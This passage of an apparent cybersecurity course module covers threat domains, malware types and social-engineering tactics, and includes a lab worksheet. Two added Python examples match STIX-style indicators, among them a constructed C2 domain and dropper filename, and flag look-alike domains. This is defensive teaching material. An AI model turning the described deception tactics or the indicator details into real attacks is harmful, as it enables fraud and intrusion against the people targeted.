Module One

The document outlines various cybersecurity threats, vulnerabilities, and attacks that organizations face, categorizing them into domains such as software attacks, human error, and natural disasters. It emphasizes the importance of understanding both internal and external threats, as well as the role of user behavior in maintaining security. Additionally, it discusses the complexities of threats, including advanced persistent threats and social engineering tactics used by cybercriminals to exploit human nature.

Module 1: Cybersecurity Threats, Vulnerabilities, and Attacks
Common Threats
1.1.1 Threat Domains
With organizations facing an ever-growing number of cyber threats, it is critical
that they have robust security solutions in place. But in order to protect
themselves, organizations first need to know what vulnerabilities exist within
their threat domains. A ‘threat domain’ is considered to be an area of control,
authority or protection that attackers can exploit to gain access to a system.
There are many ways that attackers can uncover vulnerabilities and exploit
systems within a domain.

1.1.2 Types of Cyber Threats


Cyber threats can be classified into different categories. This allows
organizations to assess the likelihood of a threat occurring and understand the
monetary impact of a threat so that they can prioritize their security efforts.
Examples of cyber threats in each of these categories:
Software Attacks
- A successful denial-of-service (DoS) attack.
- A computer virus.
Software Errors
- A software bug.
- An application going offline.
- A cross-site script or illegal file server share.
Sabotage
- An authorized user successfully penetrating and compromising an
organization’s primary database.
- The defacement of an organization’s website.
Human error
- Inadvertent data entry errors.
- A firewall misconfiguration.
Theft
- Laptops or equipment being stolen from an unlocked room.
Hardware Failures
- Hard drive crashes.
Utility Interruption
- Electrical power outages.
- Water damage resulting from sprinkler failure.
Natural Disasters
- Severe storms such as hurricanes or tornadoes.
- Earthquakes.
- Floods.
- Fires.

1.1.4 Internal vs External Threats


Threats can originate from both within and outside of an organization, with
attackers seeking access to valuable sensitive information such as personnel
records, intellectual property, and financial data.
Internal threats are usually carried out by current or former employees and
other contract partners who accidentally or intentionally mishandle confidential
data or threaten the operations of servers or network infrastructure devices by
connecting infected media or by accessing malicious emails or websites.
The source of an external threat typically stems from amateur or skilled
attackers who can exploit vulnerabilities in networked devices or can use social
engineering techniques, such as trickery, to gain access to an organization’s
internal resources.
1.1.5 Avatar
Did you know that internal threats have the potential to cause greater damage
than external threats? This is because employees or partners working within an
organization have direct access to its premises and infrastructure devices. They
will also have insider knowledge of the organization’s network, resources and
confidential data, as well as the security countermeasures in place.

1.1.6 Know the Difference


You are worried about some potential threats that were recently reported at
@Apollo. But before you can address them, you need to understand if the
threats came from an internal or an external source.

1.1.7 Avatar
Cyber threats can spread in various ways such as through users themselves,
via devices connected to the network or via services hosted on a public or
private cloud. And don’t forget the threat of a physical attack if the right
security measures are not in place.
Let’s take a look at these in more detail.

1.1.8 User Threats and Vulnerabilities


A user domain includes anyone with access to an organization’s information
system, including employees, customers and contract partners. Users are often
considered to be the weakest link in information security systems, posing a
significant threat to the confidentiality, integrity and availability of an
organization’s data.
The most common user threats found in many organizations are described
below.
No awareness of security
Users must be aware of and understand an organization’s sensitive data,
security policies and procedures, technologies and countermeasures that are
implemented in order to protect information and information systems.
Poorly enforced security policies
All users must be aware of and understand an organization’s security policies,
as well as the consequences of non-compliance.
Data theft
Data stolen by users can pose a significant financial threat to organizations,
both in terms of the resulting damage to their reputation and/or the legal
liability associated with the disclosure of sensitive information.
Unauthorized downloads and media
Many network and device infections and attacks can be traced back to users
who have downloaded unauthorized emails, photos, music, games, apps and
videos to their computers, networks or storage devices, or used unauthorized
media such as external hard disks and USB drives.
Unauthorized virtual private networks (VPNs)
VPNs can hide the theft of unauthorized information because the encryption
normally used to protect confidentiality can stop a network administrator from
tracking data transmission (unless they have permission to do so).
Unauthorized websites
Accessing unauthorized websites can pose a risk to a user’s data and devices,
as well as the organization itself. Often, these websites prompt users to
download scripts or plugins that contain malicious code or adware. Some of
these sites can even take over user devices like cameras and applications.
Destruction of systems, applications or data
The accidental or deliberate destruction or sabotage of systems, applications
and data poses a serious risk to all organizations. Activists, disgruntled
employees or industry competitors attempt to delete data and destroy or
misconfigure devices, to make organizational data and information systems
unavailable.
Always keep in mind that there are no technical solutions, controls or
countermeasures that will make information systems any more secure than the
behaviors and processes of the people who use these systems.

1.1.9 Threats to Devices


- Any devices left powered on and unattended pose the risk of someone
gaining unauthorized access to network resources.
- Downloading files, photos, music or videos from unreliable sources could
lead to the execution of malicious code on devices.
- Cybercriminals often exploit security vulnerabilities within software
installed on an organization’s devices to launch an attack.
- An organization’s information security teams must try to keep up to date
with the daily discovery of new viruses, worms and other malware that
pose a threat to their devices.
- Users who insert unauthorized USB drives, CDs or DVDs run the risk of
introducing malware, or compromising data stored on their device.
- Policies are in place to protect an organization’s IT infrastructure. A user
can face serious consequences for purposefully violating such policies.
- Using outdated hardware or software makes an organization’s systems
and data more vulnerable to attack.

1.1.10 Threats to the Local Area Network


The local area network (LAN) is a collection of devices, typically in the same
geographic area, connected by cables (wired) or airwaves (wireless).
Because users can access an organization’s systems, applications and data
from the LAN domain, it is critical that it has strong security and stringent
access controls.
- Unauthorized access to wiring closets, data centers and computer
rooms.
- Unauthorized access to systems, applications and data.
- Network operating system or software vulnerabilities and updates.
- Rogue users gaining unauthorized access to wireless networks.
- Exploits of data in transit.
- Having LAN servers with different hardware or operating systems makes
managing and troubleshooting them more difficult.
- Unauthorized network probing and port scanning.
- Misconfigured firewalls.

1.1.11 Threats to the Private Cloud


The private cloud domain includes any private servers, resources and IT
infrastructure available to members of a single organization via the Internet.
While many organizations feel that their data is safer in a private cloud, this
domain still poses significant security threats, including:
- Unauthorized network probing and port scanning.
- Unauthorized access to resources.
- Router, firewall or network device operating system or software
vulnerabilities.
- Router, firewall or network device configuration errors.
- Remote users accessing an organization’s infrastructure and
downloading sensitive data.

1.1.12 Threats to the Public Cloud


Where a private cloud domain hosts computing resources for a single
organization, the public cloud domain is the entirety of computing services
hosted by a cloud, service or Internet provider that are available to the public
and shared across organizations.
There are three models of public cloud services that organizations may choose
to use.
Software as a Service (SaaS)
This is a subscription-based model that provides organizations with software
that is centrally hosted and accessed by users via a web browser, app or other
software. In other words, this is software not stored locally but in the cloud.
Platform as a Service (PaaS)
This subscription-based model provides a platform that allows an organization
to develop, run and manage its applications on the service’s hardware, using
tools that the service provides. This platform is accessed via the public cloud.
Infrastructure as a Service (IaaS)
This subscription-based model provides virtual computing resources such as
hardware, software, servers, storage and other infrastructure components over
the Internet. An organization will buy access to them and use them via the
public cloud.

1.1.13 Avatar
While public cloud service providers do implement security controls to protect
the cloud environment, organizations are responsible for protecting their own
resources on the cloud. Therefore, some of the most common threats to the
public cloud domain include:
- Data breaches.
- Loss or theft of intellectual property.
- Compromised credentials or account hijacking.
- Social engineering attacks.
- Compliance violation.

1.1.15 Threats to Applications


The application domain includes all of the critical systems, applications and
data used by an organization to support operations. Increasingly, organizations
are moving applications such as email, security monitoring and database
management to the public cloud.
Common threats to applications include:
- Someone gaining unauthorized access to data centers, computer rooms,
wiring closets or systems.
- Server downtime during maintenance periods.
- Network operating system software vulnerabilities.
- Data loss.
- Client-server or web application development vulnerabilities.

1.1.17 Threat Complexity


Software vulnerabilities occur as a result of programming mistakes, protocol
vulnerabilities or system misconfigurations. Cybercriminals seek to take
advantage of such vulnerabilities and are becoming increasingly sophisticated
in their attack methods.
An advanced persistent threat (APT) is a continuous attack that uses elaborate
espionage tactics involving multiple actors and/or sophisticated malware to
gain access to and analyze a target’s network.
Attackers operate under the radar and remain undetected for a long period of
time, with potentially devastating consequences. APTs typically target
governments and high-level organizations and are usually well-orchestrated
and well-funded.
As the name suggests, algorithm attacks take advantage of algorithms in a
piece of legitimate software to generate unintended behaviors. For example,
algorithms used to track and report how much energy a computer consumes
can be used to select targets or trigger false alerts. They can also disable a
computer by forcing it to use up all its RAM or by overworking its central
processing unit (CPU).

1.1.18 Avatar
Many organizations rely on threat intelligence data to help them understand
their overall risk, so that they can formulate and put in place effective
preventative and response measures.
Some of this data is closed source and requires a paid subscription for access.
Other data is considered open source intelligence (OSINT) and can be accessed
from publicly available information sources. In fact, sharing threat intelligence
data is becoming more popular, with governments, universities, healthcare
sector organizations and private businesses working together to improve
everyone’s security.

1.1.19 Backdoors and Rootkits


Cybercriminals also use many different types of malicious software (known as
malware) to carry out their attacks.
Backdoor
Backdoor programs, such as Netbus and Back Orifice, are used by
cybercriminals to gain unauthorized access to a system by bypassing the
normal authentication procedures.
Cybercriminals typically have authorized users unknowingly run a remote
administration tool (RAT) on their machine to install a backdoor that
gives the criminal administrative control over a target computer. Backdoors
grant cybercriminals continued access to a system, even if the organization has
fixed the original vulnerability used to attack the system.
Rootkits
This malware is designed to modify the operating system to create a backdoor,
which attackers can then use to access the computer remotely.
Most rootkits take advantage of software vulnerabilities to gain access to
resources that normally shouldn’t be accessible (privilege escalation) and
modify system files.
Rootkits can also modify system forensics and monitoring tools, making them
very hard to detect. In most cases, a computer infected by a rootkit has to be
wiped and any required software reinstalled.

1.1.20 Threat Intelligence and Research Sources


The United States Computer Emergency Readiness Team (US-CERT) and the
U.S. Department of Homeland Security sponsor a dictionary of common
vulnerabilities and exposures (CVE).
Each CVE entry contains a standard identifier number, a brief description of the
security vulnerability and any important references to related vulnerability
reports. The CVE list is maintained by a not-for-profit, the MITRE Corporation,
on its public website.
The dark web
This refers to encrypted web content that is not indexed by conventional search
engines and requires specific software, authorization or configurations to
access. Expert researchers monitor the dark web for new threat intelligence.
Indicator of compromise (IOC)
IOCs such as malware signatures or domain names provide evidence of
security breaches and details about them.
Automated Indicator Sharing (AIS)
Automated Indicator Sharing (AIS), a Cybersecurity and Infrastructure Security
Agency (CISA) capability, enables the real-time exchange of cybersecurity
threat indicators using a standardized and structured language called
Structured Threat Information Expression (STIX) and Trusted Automated
Exchange of Intelligence Information (TAXII).
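As an added example that is not part of the course material, the Python below matches simple STIX-style indicator patterns (the kind exchanged over AIS) against constructed log lines. The indicator values, hostnames, addresses and hash are all constructed, and only OR-joined equality comparisons are supported; anything else is rejected rather than misread.

```python
"""Match simple STIX-style indicator patterns against constructed log lines.

Added example, not part of the course material.  Only the simplest STIX 2.1
pattern shape is supported: equality comparisons joined by OR inside one
pair of square brackets, for instance
    [domain-name:value = 'evil-cdn.example']
    [file:hashes.'SHA-256' = '<hex>' OR file:name = 'invoice_2024.pdf.exe']
Patterns using AND, FOLLOWEDBY, REPEATS, WITHIN, START or STOP are rejected
rather than silently misread.  All indicator values and log lines are constructed.
"""
from __future__ import annotations

import re
from dataclasses import dataclass

# One comparison: object-type:property = 'value'.  The property part may
# carry a quoted hash algorithm name, as in hashes.'SHA-256'.
_COMPARISON = re.compile(
    r"(?P<type>[a-z0-9-]+):(?P<prop>[A-Za-z0-9_.'\-]+)\s*=\s*'(?P<value>[^']*)'"
)
_UNSUPPORTED = re.compile(r"\b(AND|FOLLOWEDBY|REPEATS|WITHIN|START|STOP)\b")


@dataclass(frozen=True)
class Indicator:
    name: str
    pattern: str


def parse_pattern(pattern: str) -> list[tuple[str, str]]:
    """Return [("type:prop", value), ...]; any one matching pair satisfies the pattern."""
    body = pattern.strip()
    if not (body.startswith("[") and body.endswith("]")):
        raise ValueError(f"pattern must be enclosed in [ ]: {pattern!r}")
    inner = body[1:-1]
    if _UNSUPPORTED.search(inner):
        raise ValueError(f"only OR-joined equality comparisons are supported: {pattern!r}")
    pairs = []
    for m in _COMPARISON.finditer(inner):
        prop = m["prop"].replace("'", "")          # hashes.'SHA-256' -> hashes.SHA-256
        pairs.append((f"{m['type']}:{prop}", m["value"]))
    if not pairs:
        raise ValueError(f"no comparisons found in {pattern!r}")
    return pairs


def parse_log_line(line: str) -> tuple[str, dict[str, str]]:
    """Turn a constructed key=value log line into (host, STIX-style observables).

    Values are normalised the way indicators are written: domain names are
    lower-cased with any trailing dot removed, hashes are lower-cased.
    """
    fields = dict(kv.split("=", 1) for kv in line.split() if "=" in kv)
    observables: dict[str, str] = {}
    if "query" in fields:
        observables["domain-name:value"] = fields["query"].lower().rstrip(".")
    if "answer" in fields:
        observables["ipv4-addr:value"] = fields["answer"]
    if "file" in fields:
        observables["file:name"] = fields["file"]
    if "sha256" in fields:
        observables["file:hashes.SHA-256"] = fields["sha256"].lower()
    return fields.get("host", "?"), observables


def indicator_matches(indicator: Indicator, observables: dict[str, str]) -> bool:
    """True when any comparison in the (OR-only) pattern equals an observable."""
    return any(observables.get(key) == value for key, value in parse_pattern(indicator.pattern))


def scan(lines: list[str], indicators: list[Indicator]) -> list[tuple[str, str]]:
    """Return (host, indicator name) for every log line that hits an indicator."""
    hits = []
    for line in lines:
        host, observables = parse_log_line(line)
        for indicator in indicators:
            if indicator_matches(indicator, observables):
                hits.append((host, indicator.name))
    return hits


# Constructed indicators: reserved .example TLD, and a placeholder hash, not a real sample.
INDICATORS = [
    Indicator("constructed C2 domain", "[domain-name:value = 'evil-cdn.example']"),
    Indicator("constructed dropper",
              "[file:hashes.'SHA-256' = '" + "ab" * 32 + "' OR file:name = 'invoice_2024.pdf.exe']"),
]

# Constructed DNS and file-creation events; addresses come from documentation ranges.
LOG_LINES = [
    "ts=2024-05-01T09:12:03Z host=ws-17 query=cdn.example answer=198.51.100.4",
    "ts=2024-05-01T09:12:07Z host=ws-17 query=EVIL-CDN.example. answer=203.0.113.9",
    "ts=2024-05-01T09:13:40Z host=ws-22 file=report.pdf sha256=" + "cd" * 32,
    "ts=2024-05-01T09:14:02Z host=ws-22 file=invoice_2024.pdf.exe sha256=" + "00" * 32,
]

if __name__ == "__main__":
    for host, name in scan(LOG_LINES, INDICATORS):
        print(f"{host}: matched indicator {name!r}")
```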
Next Up...
Once a cybercriminal understands the vulnerabilities of a device, system or
network, they will go to great lengths to deceive potential victims and gain
access to sensitive information.

1.2 Deception
1.2.1 Social Engineering
Social engineering is a non-technical strategy that attempts to manipulate
individuals into performing certain actions or divulging confidential information.
Rather than software or hardware vulnerabilities, social engineering exploits
human nature, taking advantage of people’s willingness to help or preying on
their weaknesses, such as greed or vanity.
Some common types of social engineering attacks are described below.
Pretexting
This type of attack occurs when an individual lies to gain access to privileged
data. For example, an attacker pretends to need personal or financial data in
order to confirm a person’s identity.
Something for something (quid pro quo)
Quid pro quo attacks involve a request for personal information in exchange for
something, like a gift. For example, a malicious email could ask you to give
your sensitive personal details in exchange for a free vacation.
Identity fraud
This is the use of a person’s stolen identity to obtain goods or services by
deception. For example, someone has acquired your data and is attempting to
issue a credit card in your name.

1.2.2 Social Engineering Tactics


Cybercriminals rely on several social engineering tactics to gain access to
sensitive information.
Authority
Attackers prey on the fact that people are more likely to comply when
instructed by someone they perceive as an authority figure.
For example, an executive opens what looks like an official subpoena
attachment but is actually an infected PDF.
Intimidation
Cybercriminals will often bully a victim into taking an action that compromises
security.
For example, a secretary receives a call that their boss is about to give an
important presentation but the files are corrupt. The criminal on the phone
claims it’s the secretary’s fault and pressures the secretary to send across the
files immediately or risk dismissal.
Consensus
Often called ‘social proof,’ consensus attacks work because people tend to act
in the same way as other people around them, thinking that something must
be right if others are doing it.
For example, cybercriminals may publish a social media post about a ‘business
opportunity’ and get dozens of legitimate or illegitimate accounts to comment
on its validity underneath, which encourages unsuspecting victims to make a
purchase.
Scarcity
A well known marketing tactic, scarcity attacks work because attackers know
that people tend to act when they think there is a limited quantity of something
available.
For example, someone receives an email about a luxury item being sold for
very little money, but it states that there are only a handful available at this
price, in an effort to spur the unsuspecting victim into taking action.
Urgency
Similarly, people also tend to act when they think there is a limited time to do
so.
For example, cybercriminals promote a fake time-limited shipping offer to try
and prompt victims to take action quickly.
Familiarity
People are more likely to do what another person asks if they like this person.
Therefore, attackers will often try to build a rapport with their victim in order to
establish a relationship. In other cases, they may clone the social media profile
of a friend of yours, in order to get you to think you are speaking to them.
Trust
Building trust in a relationship with a victim may require more time to establish.
For example, a cybercriminal disguised as a security expert calls the
unsuspecting victim to offer advice. When helping the victim, the ‘security
expert’ discovers a ‘serious error’ that needs immediate attention. The solution
provides the cybercriminal with the opportunity to violate the victim’s security.

1.2.3 Avatar
Remember that cybercriminals’ repertoire is vast and ever-evolving. Sometimes,
they might combine two or more of the above tactics to increase their chances.
It is up to cybersecurity professionals to raise awareness and educate other
people in an organization about these tactics, to prevent them from falling
victim to such attacks.

1.2.5 Avatar
Most cyber attacks involve some form of deception. Let’s take a look at some of
these.

1.2.6 Shoulder Surfing and Dumpster Diving


Shoulder surfing is a simple attack that involves observing or literally looking
over a target’s shoulder to gain valuable information such as PINs, access
codes or credit card details. Criminals do not always have to be near their
victim to shoulder surf — they can use binoculars or security cameras to obtain
this information.
This is one reason why an ATM screen can only be viewed at certain angles.
These types of safeguards make shoulder surfing much more difficult.
You may have heard of the phrase, ‘one man's trash is another man's treasure.’
Nowhere is this more true than in the world of dumpster diving — the process
of going through a target's trash to see what information has been thrown out.
This is why documents containing sensitive information should be shredded or
stored in burn bags until they are destroyed by fire after a certain period of
time.

1.2.7 Impersonation and Hoaxes


Cybercriminals have many other deception techniques to help them succeed.
Impersonation
This is the act of tricking someone into doing something they would not
ordinarily do by pretending to be someone else. For example, a cybercriminal
posing as an IRS employee recently targeted taxpayers, telling the victims that
they owed money that had to be paid immediately via wire transfer – or risk
arrest.
Criminals can also use impersonation to attack others. For example, they can
pose as their victim online and post on websites or social media pages to
undermine the victim’s credibility.
Hoaxes
A hoax is an act intended to deceive or trick someone, and can cause just as
much disruption as an actual security breach.
For example, a message warns of a non-existent virus threat on a device and
asks the recipient to share this information with everyone they know. This
hoax elicits a user reaction, creating unnecessary fear and irrational behavior
that is perpetuated through email and social media.

1.2.8 Piggybacking and Tailgating


Piggybacking or tailgating occurs when a criminal follows an authorized person
to gain physical entry into a secure location or a restricted area. Criminals can
achieve this by:
- Giving the appearance of being escorted into the facility by an
authorized person.
- Joining and pretending to be part of a large crowd that enters the facility.
- Targeting an authorized person who is careless about the rules of the
facility.
One way of preventing this is to use two sets of doors. This is sometimes
referred to as a mantrap and means individuals enter through an outer door,
which must close before they can gain access through an inner door.

1.2.9 Other Methods of Deception


Be aware that attackers have many more tricks up their sleeve to deceive their
victims.
Invoice scam
Fake invoices are sent with the goal of receiving money from a victim by
prompting them to put their credentials into a fake login screen. The fake
invoice may also include urgent or threatening language.
Watering hole attack
A watering hole attack describes an exploit in which an attacker observes or
guesses what websites an organization uses most often, and infects one or
more of them with malware.
Typosquatting
This type of attack relies on common mistakes such as typos made by
individuals when inputting a website address into their browser. The incorrect
URL will bring the individuals to a legitimate-looking website owned by the
attacker, whose goal is to gather their personal or financial information.
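As an added example that is not part of the course material, the Python below flags look-alike domains from proxy or mail logs against an organization's own domains, the defensive counterpart of the typosquatting described above. The BRAND_DOMAINS allowlist and every candidate are constructed, and the "registrable domain" is approximated as the last two labels (a real deployment would use the Public Suffix List); verdicts are meant for analyst review, not automatic blocking.

```python
"""Flag look-alike (typosquatted) domains against an organisation's own domains.

Added example, not part of the course material.  BRAND_DOMAINS and every
candidate below are constructed.  A candidate is checked for: the owned label
reused as a subdomain, the owned label under another TLD, look-alike character
substitution (0/o, 1/l, rn/m, vv/w), a small edit distance, and the owned label
embedded in a longer label.  "Registrable domain" is approximated as the last
two labels; production code should use the Public Suffix List instead.
"""
from __future__ import annotations

from urllib.parse import urlsplit

# Constructed allowlist of domains this organisation owns.
BRAND_DOMAINS = {"apollo-bank.example", "apollo.example"}

# Multi-character substitutions first so "rn" is folded before "1" or "0".
HOMOGLYPHS = {"rn": "m", "vv": "w", "0": "o", "1": "l"}


def fold_homoglyphs(label: str) -> str:
    """Map look-alike characters to the letters they imitate."""
    out = label.lower()
    for lookalike, letter in HOMOGLYPHS.items():
        out = out.replace(lookalike, letter)
    return out


def edit_distance(a: str, b: str) -> int:
    """Optimal string alignment distance: insert, delete, substitute or swap adjacent chars."""
    d = [[0] * (len(b) + 1) for _ in range(len(a) + 1)]
    for i in range(len(a) + 1):
        d[i][0] = i
    for j in range(len(b) + 1):
        d[0][j] = j
    for i in range(1, len(a) + 1):
        for j in range(1, len(b) + 1):
            cost = 0 if a[i - 1] == b[j - 1] else 1
            d[i][j] = min(d[i - 1][j] + 1, d[i][j - 1] + 1, d[i - 1][j - 1] + cost)
            if i > 1 and j > 1 and a[i - 1] == b[j - 2] and a[i - 2] == b[j - 1]:
                d[i][j] = min(d[i][j], d[i - 2][j - 2] + 1)   # transposition counts as one edit
    return d[len(a)][len(b)]


def classify(url_or_host: str) -> tuple[str, str]:
    """Return ("allowed" | "suspicious" | "unrelated", reason) for a URL or bare hostname."""
    target = url_or_host if "//" in url_or_host else "//" + url_or_host
    host = (urlsplit(target).hostname or "").rstrip(".")   # hostname is already lower-cased
    labels = host.split(".")
    registrable = ".".join(labels[-2:])                     # simplification, see module docstring
    if registrable in BRAND_DOMAINS:
        return "allowed", f"{registrable} is an owned domain"
    sld = labels[-2] if len(labels) >= 2 else host
    for brand in sorted(BRAND_DOMAINS):
        owned = brand.split(".")[0]
        if owned in labels[:-2]:                            # apollo-bank.example.evil.test
            return "suspicious", f"owned label '{owned}' used as a subdomain of {registrable}"
        if sld == owned:                                    # apollo-bank.test
            return "suspicious", f"owned label '{owned}' registered under another TLD: {registrable}"
        folded, owned_folded = fold_homoglyphs(sld), fold_homoglyphs(owned)
        if folded == owned_folded:                          # apol1o-bank.example
            return "suspicious", f"'{sld}' folds to '{owned}' via look-alike characters"
        budget = 1 if len(owned) < 8 else 2                 # short names tolerate fewer typos
        if edit_distance(folded, owned_folded) <= budget:   # apollo-bnak.example
            return "suspicious", f"'{sld}' is within {budget} edit(s) of '{owned}'"
        if owned in sld:                                    # apollo-bank-login.example
            return "suspicious", f"'{sld}' embeds the owned label '{owned}'"
    return "unrelated", f"{registrable} does not resemble an owned domain"


if __name__ == "__main__":
    for candidate in ["https://www.apollo-bank.example/login", "apol1o-bank.example",
                      "apollo-bnak.example", "apollo-bank.example.evil.test",
                      "apollo-bank.test", "news.example"]:
        verdict, reason = classify(candidate)
        print(f"{candidate:40} {verdict:10} {reason}")
```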
Prepending
Attackers can remove the ‘external’ email tag used by organizations to warn
the recipient that an email has originated from an external source. This tricks
individuals into believing that a malicious email was sent from inside their
organization.
Influence campaigns
Often used in cyberwarfare, influence campaigns are usually very well
coordinated and blend various methods such as fake news, disinformation
campaigns and social media posts.

1.2.11 Defending Against Deception


Organizations need to promote awareness of social engineering tactics and
properly educate employees on prevention measures. Here are some top tips.
- Never disclose confidential information or credentials via email, chat,
text messages, in person or over the phone to unknown parties.
- Resist the urge to click on enticing emails and web links.
- Be wary of uninitiated or automatic downloads.
- Establish and educate employees on key security policies.
- Encourage employees to take ownership of security issues.
- Do not give in to pressure by unknown individuals.

Lab - Explore Social Engineering Techniques


Objectives

Part 1: Explore Social Engineering Techniques

Part 2: Create a Cybersecurity Awareness Poster

Introduction

Cybersecurity is critical because it involves protecting sensitive data, personally
identifiable information (PII), protected health information (PHI), personal
information, intellectual property (IP), and sensitive systems from unauthorized
access. Social engineering is a broad range of malicious activities accomplished by
psychologically manipulating people into performing actions or divulging
confidential information. In this lab, you will explore social engineering
techniques, sometimes called human hacking, which is a broad category for
different types of attacks.

Required Resources

PC or mobile device with internet access

Background / Scenario

Recent research reveals that the most common types of cyberattacks are becoming more
sophisticated, and the attack targets are growing. The purpose of an attack is to steal
information, disable systems or critical services, disrupt systems, activities, and operations.
Some attacks are designed to destroy information or information systems, maliciously
control a computing environment or its infrastructure, or destroy the integrity of data and/or
information systems. One of the most effective ways an attacker can gain access to an
organization’s network is through simple deception. In the cybersecurity world this is called
social engineering.

Social Engineering Attacks

Social engineering attacks are very effective because people want to trust other people and
social engineering attacks are not the kind of attack that the average user guards against;
users are concerned with botnets, identity theft or ransomware. These are big external
threats, so they do not think to question what seems to be a legitimate-looking message.

Baiting
Baiting relies on the curiosity or greed of the victim. What distinguishes baiting from other
types of social engineering is the promise of an item or good that hackers use to entice
victims. Baiters may offer users free music or movie downloads if the users surrender their
login credentials to a certain site. Baiting attacks are not restricted to online schemes.
Attackers can exploit human curiosity with physical media like USB drives.

Shoulder Surfing

Shoulder surfing is literally looking over someone's shoulder to get information. Shoulder
surfing is an effective way to get information in crowded places because it is relatively easy
to stand next to someone and watch as they fill out a form or enter a PIN at an
ATM. Shoulder surfing can also be done long distance with the aid of modern cell
phones, binoculars, or other vision-enhancing devices. To prevent shoulder surfing, experts
recommend that you shield paperwork or your keypad from view by using your body or
cupping your hand. There are even screen shields that make shoulder surfing much more
difficult.

Pretexting

Pretexting is using deception to create a scenario to convince victims to divulge
information they should not divulge. Pretexting is often used against organizations that
retain client data, such as financial data, credit card numbers, utilities account numbers, and
other sensitive information. Pretexters often request information from individuals in an
organization by impersonating a supervisor, helpdesk clerk, or client, usually by phone,
email, or text.

Phishing, spear phishing, and whaling attacks

In phishing attacks, the attackers try to obtain personal information or data, like username,
password, and credit card details, by disguising themselves as trustworthy entities. Phishing
is mainly conducted through emails and phone calls. Spear phishing is a more targeted
version of phishing in which an attacker chooses specific individuals or enterprises and
then customizes their phishing attack to their victims to make it less conspicuous. Whaling
is when the specific target is a high-profile employee such as a CEO or CFO.

Scareware and ransomware

Ransomware attacks involve injecting malware that encrypts a victim’s critical data. The
cyber criminals request a ransom to be paid to decrypt the data. However, even if a ransom
is paid, there is no guarantee the cyber criminals will decrypt the information. Ransomware
is one of the fastest growing types of cyberattack and has affected thousands of financial
organizations, government agencies, healthcare facilities, even schools and our education
systems.

Scareware takes advantage of a user’s fear by coaxing them into installing fake antivirus
software.
Tailgating

Tailgating tricks the victim into helping the attacker gain unauthorized access into the
organization’s physical facilities. The attacker seeks entry into a restricted area where
access is controlled by software-based electronic devices or human guards. Tailgating can
also involve the attacker following an employee closely to pass through a locked door
before the door locks behind the employee.

Dumpster diving

In the world of social engineering, dumpster diving is a technique used to retrieve discarded
information thrown in the trash to carry out an attack on a person or organization. Dumpster
diving is not limited to searching through the trash for obvious treasures like access codes
or passwords written down on sticky notes; it can also involve electronic information left
on desktops, or stored on USB drives.

Part 1. Explore Social Engineering Techniques


Step 1: Explore Baiting, Shoulder Surfing, and Pretexting.

The National Support Center for Systems Security and Information Assurance (CSSIA)
hosts a Social Engineering Interactive activity. The current link to the site
is https://www.cssia.org/social_engineering/. However, if the link changes, try searching
for #CSSIA Social Engineering Interactive#.

Click Next in the interactive activity, and then use the content to answer the following
questions.

What is baiting? Did you click on the USB drive? What happened to the victim’s system?

Answer Area


What is Shoulder Surfing? What device was used to perform the shoulder surfing? What
information was gained?

Answer Area


What is Pretexting? What type of information did the cybercriminal request? Would you
fall victim?


Step 2: Explore Phishing, Spear Phishing, and Whaling

Phishing is designed to get victims to click on links to malicious websites, open
attachments that contain malware, or reveal sensitive information. Use the interactive
activity to explore different phishing techniques.

In this phishing example, what is the ploy the attacker uses to trick the victim to visit the
trap website? What is the trap website used for?


What is the difference between phishing and spear phishing or whaling?


Step 3: Explore Scareware and Ransomware

Scareware is when victims are deceived into thinking that their system is infected with
malware and receive false alarms prompting them to install software that is not needed or is
itself malware. Ransomware is a type of malware that threatens to publish the victim's data
or encrypts the victim’s data preventing access or the ability to use the data.

Victims are prevented from accessing their system or personal files until they make a
ransom payment to regain access.

What data does the attacker claim to have in this example? Would you fall for this
deception?


What is the attacker requesting the victim do to get the data back?


What is tailgating?

Give three ways to prevent social engineering attacks?


Part 2. Create a Cybersecurity Awareness Poster

Use PowerPoint to create a poster that will make others aware of the different
social engineering techniques used to gain unauthorized access to an organization
or the organization’s data.

Pick from: Baiting, Shoulder Surfing, Pretexting, Phishing, Scareware,
Ransomware, Tailgating, or Dumpster Diving.

The poster should depict the techniques used and how users can avoid one of
these social engineering attacks. Also include directions on where the poster
should be placed within the organization.

1.3 Cyber Attacks


1.3.1 What's the Difference?
Cybercriminals use many different types of malicious software, or malware, to
carry out attacks. Malware is any code that can be used to steal data, bypass
access controls or cause harm to or compromise a system.
Viruses
A virus is a type of computer program that, when executed, replicates and
attaches itself to other files, such as a legitimate program, by inserting its own
code into it. Some viruses are harmless yet others can be destructive, such as
those that modify or delete data. Most viruses require end-user interaction to
initiate activation, and can be written to act on a specific date or time.
Viruses can be spread through removable media such as USB flash drives,
Internet downloads and email attachments. The simple act of opening a file or
executing a specific program can trigger a virus. Once a virus is active, it will
usually infect other programs on the computer or other computers on the
network. Some viruses are polymorphic: they alter their own code each time they spread
in order to evade signature-based detection.
For example, the Melissa virus was released in 1999 and spread via email,
affecting tens of thousands of users and causing an estimated $1.2 billion in
damage.
Worms
A worm is a malicious software program that replicates by independently
exploiting vulnerabilities in networks. Unlike a virus, which requires a host
program to run, worms can run by themselves. Other than the initial infection
of the host, they do not require user participation and can spread very quickly
over the network, usually slowing it down.
Worms share similar patterns: they exploit system vulnerabilities, they have a
way to propagate themselves and they all contain malicious code (payload) to
cause damage to computer systems or networks.
Worms are responsible for some of the most devastating attacks on the
Internet. In 2001, the Code Red worm had infected over 300,000 servers in just
19 hours.
Trojan horse
A Trojan horse is malware that carries out malicious operations by masking its
true intent. It might appear legitimate but is, in fact, very dangerous. Trojans
run with the privileges of the user who launches them, so they can do anything that
user can do.

Unlike viruses, Trojans do not self-replicate. They are often disguised as, or bundled
with, apparently harmless files such as images, audio or video, which act as a decoy
while the malicious payload runs on the systems of unsuspecting users.

1.3.2 Logic Bombs


A logic bomb is a malicious program that waits for a trigger, such as a specified
date or database entry, to set off the malicious code. Until this trigger event
happens, the logic bomb will remain inactive.
Once activated, a logic bomb implements a malicious code that causes harm to
a computer in various ways. It can sabotage database records, erase files and
attack operating systems or applications.
Logic bombs have also been reported that target the hardware components of a device
or server, including the cooling fans, central processing unit (CPU), memory, hard
drives and power supplies, by driving these components until they overheat or fail.

1.3.3 Ransomware
This malware is designed to hold a computer system or the data it contains
captive until a payment is made.
Ransomware usually works by encrypting your data so that you cannot access
it. According to ransomware claims, once the ransom is paid via an untraceable
payment system, the cybercriminal will supply a program that decrypts the
files or send an unlock code — but in reality, many victims do not gain access
to their data even after they have paid.
Some versions of ransomware can take advantage of specific system
vulnerabilities to lock it down. Ransomware is often spread through phishing
